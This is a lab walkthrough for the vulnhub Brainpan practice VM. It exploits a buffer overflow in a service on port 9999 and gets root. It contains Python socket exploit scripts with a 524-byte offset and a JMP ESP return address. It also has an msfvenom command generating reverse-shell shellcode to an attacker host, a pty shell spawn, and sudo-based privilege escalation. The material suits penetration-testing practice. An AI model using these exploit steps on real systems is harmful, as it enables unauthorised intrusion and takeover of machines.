If your weak area is buffer overflow exploits then vulnhub’s Brainpan is the vm you need to conquer. This is the vulnhub Brainpan walkthrough for Kali Linux.
Want to setup a home pentesting lab to practice your ethical hacking skills? I spell out how it’s done in the 10 easy steps post.
Table of Contents
Here’s What You Need:
- Brainpan from vulnhub.
- Kali Linux Virtual Machine (VirtualBox)
- Client Virtual Machine with Immunity Debugger (VirtualBox)
Why Bother with Buffer Overflows?
There comes a time when the only attack surface of a target is a vulnerable application. In that case it is possible to exploit the application itself.
Buffer Overflow
Basically the logic is:
- Overflow to find the number of bytes needed to overflow the buffer.
- Find the exact location of the overwritten instruction pointer.
- Send enough bytes to reach the instruction pointer then use a JMP ESP address to overwrite it with instructing the program to execute at the location of the shell code.
- Send exploit and get a shell back.
Information Gathering
To get a listing of the hidden directories found in Brainpan I run dirb, dirb http://10.0.2.11:1000 which reveals the bin directory.
Running the Windows program with wine reveals some helpful details. The port looks familiar. This is obviously the application itself that is funning on <brainpan>:9999. So I will grab it and throw it in Immunity Debugger to start crafting an exploit.
root@kali:~/brainpan# wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.
Fuzzing the Vulnerable Program
The vulnerable application is hosted on the Brainpan vm.
root@kali:~/brainpan# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
Now I plug in the pattern as the buffer and send it on its way.
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "pattern"
try:
print "sending attack buffer"
s.connect(('brainpain ip', 9999))
data =s.recv(1024)
s.send(buffer + '\r\n')
data = s.recv(1024)
print "\n done."
except:
print "ERROR!"
root@kali:~/brainpan# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 35724134
[*] Exact match at offset 524
The exact number of “B”s to send in the attack buffer took some guessing. To recap the “B”s are merely a test sequence for the buffer to test how adding in the JMP ESP return addresss will affect the exploit. If the EIP register is overwritten by the “C”s then I know it is working. I can then replace them with shellcode. This took some testing. It was somewhere between 4-10 bytes.
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 524 is the offset remember
pattern = "A"*524
# found this using a search for jmp esp
return_address = '\x53\x93\x42\x7E'
#b="B"*10
#c="C"*472 #1000-524-4
nops = '\x90'*10
#buffer = pattern + return_address + nops + shellcode
try:
print "sending attack buffer"
s.connect(('brainpain ip', 9999))
data =s.recv(1024)
s.send(buffer + '\r\n')
data = s.recv(1024)
print "\n done."
except:
print "ERROR!"
Now I need to generate some shellcode for a reverse shell for a linux target. The “\x00” parameter means don’t include any null bytes as these may disrupt the exploit.
root@kali:~/brainpan# msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.2.5 LPORT=4444 EXITFUNC=thread –e x86/alpha_upper –b “\x00” -f c
Running the Linux shellcode now returns the shell to me from the Brainpan machine.
Linux Privilege Escalation
From here I want to get a better shell so I will run a command to get a TTY shell via Python. (Teletypewriter shell)
python -c "import pty; pty.spawn('/bin/sh')
Next I will use a common technique of seeing which commands have root-level privilege already and run them myself to escalate.
sudo -l
By running the command I list out the commands my current user can run with root privileges, and now have root!